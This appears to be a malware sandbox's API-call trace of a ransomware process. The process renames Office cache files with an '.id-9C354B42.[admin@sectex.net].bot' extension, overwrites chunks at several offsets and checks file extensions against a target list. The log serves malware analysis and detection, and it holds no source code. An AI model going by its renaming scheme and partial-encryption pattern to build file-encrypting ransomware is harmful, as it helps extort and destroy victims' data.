	[0046.867] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.868] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0046.868] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0046.868] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0046.868] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.868] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.876] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.876] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.882] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0046.883] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.883] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.898] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.898] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0047.745] SetEndOfFile (hFile=0x1d0) returned 1
	[0047.745] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0047.745] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0047.745] WriteFile (in: hFile=0x1d0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0047.746] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0047.746] WriteFile (in: hFile=0x1d0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0047.748] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0047.748] WriteFile (in: hFile=0x1d0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0047.750] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0047.750] CloseHandle (hObject=0x1d0) returned 1
	[0047.750] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0047.751] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.751] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.751] lstrlenW (lpString=".doc") returned 4
	[0047.751] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0047.751] lstrlenW (lpString=".docx") returned 5
	[0047.751] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1
	[0047.751] lstrlenW (lpString=".pdf") returned 4
	[0047.751] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0047.751] lstrlenW (lpString=".xls") returned 4
	[0047.751] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0047.751] lstrlenW (lpString=".xlsx") returned 5
	[0047.751] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1
	[0047.751] lstrlenW (lpString=".ppt") returned 4
	[0047.751] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0047.751] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.751] lstrlenW (lpString=".zip") returned 4
	[0047.751] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0047.751] lstrlenW (lpString=".rar") returned 4
	[0047.751] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0047.751] lstrlenW (lpString=".bz2") returned 4
	[0047.751] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0047.751] lstrlenW (lpString=".7z") returned 3
	[0047.751] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0047.751] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.751] lstrlenW (lpString=".dbf") returned 4
	[0047.751] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0047.751] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.751] lstrlenW (lpString=".1cd") returned 4
	[0047.751] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0047.751] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.751] lstrlenW (lpString=".jpg") returned 4
	[0047.751] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0047.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.752] lstrlenW (lpString=".doc") returned 4
	[0047.752] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0047.752] lstrlenW (lpString=".docx") returned 5
	[0047.752] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1
	[0047.752] lstrlenW (lpString=".pdf") returned 4
	[0047.752] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0047.752] lstrlenW (lpString=".xls") returned 4
	[0047.752] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0047.752] lstrlenW (lpString=".xlsx") returned 5
	[0047.752] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1
	[0047.752] lstrlenW (lpString=".ppt") returned 4
	[0047.752] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0047.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.752] lstrlenW (lpString=".zip") returned 4
	[0047.752] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0047.752] lstrlenW (lpString=".rar") returned 4
	[0047.752] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0047.752] lstrlenW (lpString=".bz2") returned 4
	[0047.752] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0047.752] lstrlenW (lpString=".7z") returned 3
	[0047.752] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0047.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.752] lstrlenW (lpString=".dbf") returned 4
	[0047.752] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0047.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.752] lstrlenW (lpString=".1cd") returned 4
	[0047.752] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0047.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75
	[0047.752] lstrlenW (lpString=".jpg") returned 4
	[0047.752] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0047.753] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0047.753] lstrlenW (lpString="osetup.dll") returned 10
	[0047.753] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0048.373] GetFileSizeEx (in: hFile=0x220, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=7378792) returned 1
	[0048.373] CloseHandle (hObject=0x220) returned 1
	[0048.374] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020
	[0048.374] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.374] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0048.375] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0048.375] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0048.375] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.375] ReadFile (in: hFile=0x220, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.381] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.383] ReadFile (in: hFile=0x220, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.386] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0048.387] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.387] ReadFile (in: hFile=0x220, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.410] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.410] WriteFile (in: hFile=0x220, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0100, lpOverlapped=0x0) returned 1
	[0048.567] SetEndOfFile (hFile=0x220) returned 1
	[0048.567] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0048.571] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.571] WriteFile (in: hFile=0x220, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.573] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.573] WriteFile (in: hFile=0x220, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.575] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.575] WriteFile (in: hFile=0x220, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.576] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0048.576] CloseHandle (hObject=0x220) returned 1
	[0048.576] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.577] lstrlenW (lpString=".doc") returned 4
	[0048.577] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0048.577] lstrlenW (lpString=".docx") returned 5
	[0048.577] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1
	[0048.577] lstrlenW (lpString=".pdf") returned 4
	[0048.577] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0048.577] lstrlenW (lpString=".xls") returned 4
	[0048.577] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0048.577] lstrlenW (lpString=".xlsx") returned 5
	[0048.577] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1
	[0048.577] lstrlenW (lpString=".ppt") returned 4
	[0048.577] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.577] lstrlenW (lpString=".zip") returned 4
	[0048.577] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0048.577] lstrlenW (lpString=".rar") returned 4
	[0048.577] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0048.577] lstrlenW (lpString=".bz2") returned 4
	[0048.577] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0048.577] lstrlenW (lpString=".7z") returned 3
	[0048.577] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.577] lstrlenW (lpString=".dbf") returned 4
	[0048.577] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.577] lstrlenW (lpString=".1cd") returned 4
	[0048.577] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0048.577] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.577] lstrlenW (lpString=".jpg") returned 4
	[0048.578] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0048.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.578] lstrlenW (lpString=".doc") returned 4
	[0048.578] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0048.578] lstrlenW (lpString=".docx") returned 5
	[0048.578] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1
	[0048.578] lstrlenW (lpString=".pdf") returned 4
	[0048.578] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0048.578] lstrlenW (lpString=".xls") returned 4
	[0048.578] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0048.578] lstrlenW (lpString=".xlsx") returned 5
	[0048.578] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1
	[0048.578] lstrlenW (lpString=".ppt") returned 4
	[0048.578] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0048.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.578] lstrlenW (lpString=".zip") returned 4
	[0048.578] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0048.578] lstrlenW (lpString=".rar") returned 4
	[0048.578] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0048.578] lstrlenW (lpString=".bz2") returned 4
	[0048.578] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0048.578] lstrlenW (lpString=".7z") returned 3
	[0048.578] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0048.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.578] lstrlenW (lpString=".dbf") returned 4
	[0048.578] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0048.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.578] lstrlenW (lpString=".1cd") returned 4
	[0048.578] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0048.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0048.578] lstrlenW (lpString=".jpg") returned 4
	[0048.578] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0048.579] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0048.579] lstrlenW (lpString="PrjPrrWW.cab") returned 12
	[0048.579] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.926] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=162970271) returned 1
	[0048.926] CloseHandle (hObject=0x1d0) returned 1
	[0048.926] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab")) returned 0x2020
	[0048.926] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.926] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0048.927] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.927] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0048.927] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.927] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.934] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.934] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.938] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0048.938] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.938] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.953] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.953] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0048.968] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.968] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb442750
	[0048.972] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.973] WriteFile (in: hFile=0x1d0, lpBuffer=0xb442750*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb442750*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.973] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.973] WriteFile (in: hFile=0x1d0, lpBuffer=0xb442750*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb442750*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0049.945] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
